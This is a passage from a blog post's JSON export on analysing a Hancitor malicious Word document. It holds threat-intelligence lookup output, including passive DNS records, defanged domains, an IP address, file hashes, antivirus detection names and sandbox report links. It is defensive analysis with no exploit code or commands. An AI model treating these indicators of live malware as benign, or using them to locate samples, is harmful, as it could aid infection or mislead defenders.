Rated<br \/>\n[+] VirusTotal pDNS Results<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-11-28&#8217;, &#8216;api[.]ipify[.]org&#8217;)<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-11-27&#8217;, &#8216;elb097307-934924932.us-east-1.elb[.]amazonaws[.]com&#8217;)<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-11-28&#8217;, &#8216;nagano-19599[.]herokussl[.]com&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-03&#8217;, &#8216;(hXXp):\/\/api[.]ipify[.]org\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-02&#8217;, &#8216;(hXXp):\/\/api[.]ipify[.]org\/&#8217;)<br \/>\n[-] No McAfee Threat Results<br \/>\n[+] ThreatCrowd IP Report Results<br \/>\n    [-] Passive DNS: (&#8216;daveluxurylimo[.]ridebitsapp[.]com&#8217;, &#8216;2020-11-22&#8217;)<br \/>\n    [-] Passive DNS: (&#8216;limo-shuttle-taxi-bkbest[.]ridebitsapp[.]com&#8217;, &#8216;2020-11-25&#8217;)<br \/>\n    [-] Passive DNS: (&#8216;ec2-54-225-220-115.compute-1[.]amazonaws[.]com&#8217;, &#8216;2020-12-09&#8217;)<\/p>\n<p>********************************************************************************<br \/>\n* Information for 8.248.113.254<br \/>\n* Observable type: ipv4 (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\n[-] No IPVoid Results<br \/>\n[-] No Malc0de Results<br \/>\n[+] AbuseIPDB Results<br \/>\n    [-] AbuseIPDB reports: 2<br \/>\n[-] No RansomwareTracker Results<br \/>\n[-] No SANS Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Not Rated<br \/>\n[-] No VirusTotal pDNS Results<br \/>\n[-] No McAfee Threat Results<br \/>\n[-] No ThreatCrowd IP Report Results<\/p>\n<p>********************************************************************************<br \/>\n* Information for 2fbff281b9d4d240ef5a800c08cf26d4d4944e73227860a7c4afeb3b11615238<br \/>\n* Observable type: hash.sha256 (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\n[+] VirusTotal File Report Results<br \/>\n    [-] Date submitted: 2020-12-09 07:53:20<br \/>\n    [-] Detected engines: 25<br \/>\n    [-] Total engines: 62<br \/>\n    [-] Scans: (&#8216;Elastic&#8217;, &#8216;malicious (high confidence)&#8217;)<br \/>\n    [-] Scans: (&#8216;Symantec&#8217;, &#8216;Trojan[.]Gen.2&#8217;)<br \/>\n    [-] Scans: (&#8216;Avast&#8217;, &#8216;VBS:Obfuscated-gen [Trj]&#8217;)<br \/>\n    [-] Scans: (&#8216;Kaspersky&#8217;, &#8216;HEUR:Trojan-Dropper.MSOffice[.]SDrop[.]gen&#8217;)<br \/>\n    [-] Scans: (&#8216;NANO-Antivirus&#8217;, &#8216;Trojan.Ole2[.]Vbs-heuristic[.]druvzi&#8217;)<br \/>\n    [-] Scans: (&#8216;ViRobot&#8217;, &#8216;DOC.Z[.]Agent.556032.A&#8217;)<br \/>\n    [-] Scans: (&#8216;F-Secure&#8217;, &#8216;Trojan[.]TR\/Kryptik[.]xdzeq&#8217;)<br \/>\n    [-] Scans: (&#8216;DrWeb&#8217;, &#8216;Trojan[.]Chanitor.59&#8217;)<br \/>\n    [-] Scans: (&#8216;VIPRE&#8217;, &#8216;LooksLike[.]Macro[.]Malware.k (v)&#8217;)<br \/>\n    [-] Scans: (&#8216;TrendMicro&#8217;, &#8216;HEUR_VBA.O2&#8217;)<br \/>\n    [-] Scans: (&#8216;McAfee-GW-Edition&#8217;, &#8216;BehavesLike.OLE2[.]Downloader[.]hg&#8217;)<br \/>\n    [-] Scans: (&#8216;SentinelOne&#8217;, &#8216;Static AI &#8211; Malicious OLE&#8217;)<br \/>\n    [-] Scans: (&#8216;Avira&#8217;, &#8216;TR\/Kryptik[.]xdzeq&#8217;)<br \/>\n    [-] Scans: (&#8216;Arcabit&#8217;, &#8216;HEUR[.]VBA[.]CG.2&#8217;)<br \/>\n    [-] Scans: (&#8216;AegisLab&#8217;, &#8216;Trojan[.]MSWord[.]Generic.4!c&#8217;)<br \/>\n    [-] Scans: (&#8216;ZoneAlarm&#8217;, &#8216;HEUR:Trojan-Dropper.MSOffice[.]SDrop[.]gen&#8217;)<br \/>\n    [-] Scans: (&#8216;Cynet&#8217;, &#8216;Malicious (score: 85)&#8217;)<br \/>\n    [-] Scans: (&#8216;TACHYON&#8217;, &#8216;Suspicious\/W97[.]NS[.]Gen&#8217;)<br \/>\n    [-] Scans: (&#8216;VBA32&#8217;, &#8216;BScope[.]TrojanBanker[.]Cridex&#8217;)<br \/>\n    [-] Scans: (&#8216;ESET-NOD32&#8217;, &#8216;a variant of Win32\/GenKryptik[.]EYBL&#8217;)<br \/>\n    [-] Scans: (&#8216;Rising&#8217;, &#8216;Trojan[.]Generic@ML.90 (RDML:f8Eizix+kbfanr6xWOun9w)&#8217;)<br \/>\n    [-] Scans: (&#8216;MaxSecure&#8217;, &#8216;Trojan[.]Malware.121218[.]susgen&#8217;)<br \/>\n    [-] Scans: (&#8216;Fortinet&#8217;, &#8216;W32\/GenKryptik[.]EYBY!tr&#8217;)<br \/>\n    [-] Scans: (&#8216;AVG&#8217;, &#8216;VBS:Obfuscated-gen [Trj]&#8217;)<br \/>\n    [-] Scans: (&#8216;Qihoo-360&#8217;, &#8216;virus[.]office[.]obfuscated.1&#8217;)<\/p>\n<p>********************************************************************************<br \/>\n* Information for ec1fda96044f67abf36e7d3ddbf9fdb06b9fba9c7d29761487221568746dd05b<br \/>\n* Observable type: hash.sha256 (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\n[-] No VirusTotal File Report Results<\/p>\n<p>Munin results<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>\n 1 \/ 2 &gt; Unknown<br \/>\nHASH: ec1fda96044f67abf36e7d3ddbf9fdb06b9fba9c7d29761487221568746dd05b COMMENT: W0rd.dll<br \/>\nRESULT: &#8211; \/ &#8211;<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"https:\/\/any.run\/report\/ec1fda96044f67abf36e7d3ddbf9fdb06b9fba9c7d29761487221568746dd05b\" rel=\"noopener noreferrer\" target=\"_blank\">https:\/\/any.run\/report\/ec1fda96044f67abf36e7d3ddbf9fdb06b9fba9c7d29761487221568746dd05b<\/a><\/p>\n<p> 2 \/ 2 &gt; Malicious<br \/>\nHASH: 2fbff281b9d4d240ef5a800c08cf26d4d4944e73227860a7c4afeb3b11615238 COMMENT: 1208_37832604.doc<br \/>\nVIRUS: Kaspersky: HEUR:Trojan-Dropper.MSOffice.SDrop.gen \/ TrendMicro: HEUR_VBA.O2 \/ ESET-NOD32: a variant of Win32\/GenKryptik.EYBL \/ Symantec: Trojan.Gen.2 \/ F-Secure: Trojan.TR\/Kryptik.xdzeq<br \/>\nTYPE: &#8211; SIZE: 0 FILENAMES: &#8211;<br \/>\nFIRST: &#8211; LAST: 2020-12-09 07:53:20 SUBMISSIONS: 0 REPUTATION: 0<br \/>\nCOMMENTS: 0 USERS: &#8211; TAGS:<br \/>\nRESULT: 25 \/ 62<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"https:\/\/any.run\/report\/2fbff281b9d4d240ef5a800c08cf26d4d4944e73227860a7c4afeb3b11615238\" rel=\"noopener noreferrer\" target=\"_blank\">https:\/\/any.run\/report\/2fbff281b9d4d240ef5a800c08cf26d4d4944e73227860a7c4afeb3b11615238<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Summary ======== This quick post stems from a tweet from @James_inthe_box about some Hancitor malware that he was seeing. After several attempts at trying to get a maldoc to download in the past, I was able to today. Out of the several links that I had, only one worked. For a list of other links that I saw, please see this Pastebin. The others did what they have always done in the past &#8211; redirected me to a Docusign site. For the artifacts and such, please see my Github repo for this here. Analysis ======== Once the maldoc was obtained,&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=1430\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[45,44],"class_list":["post-1430","post","type-post","status-publish","format-standard","hentry","category-packet-analysis","tag-hancitor","tag-malware-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1430","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1430"}],"version-history":[{"count":4,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1430\/revisions"}],"predecessor-version":[{"id":1441,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1430\/revisions\/1441"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1430"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1430"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1430"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}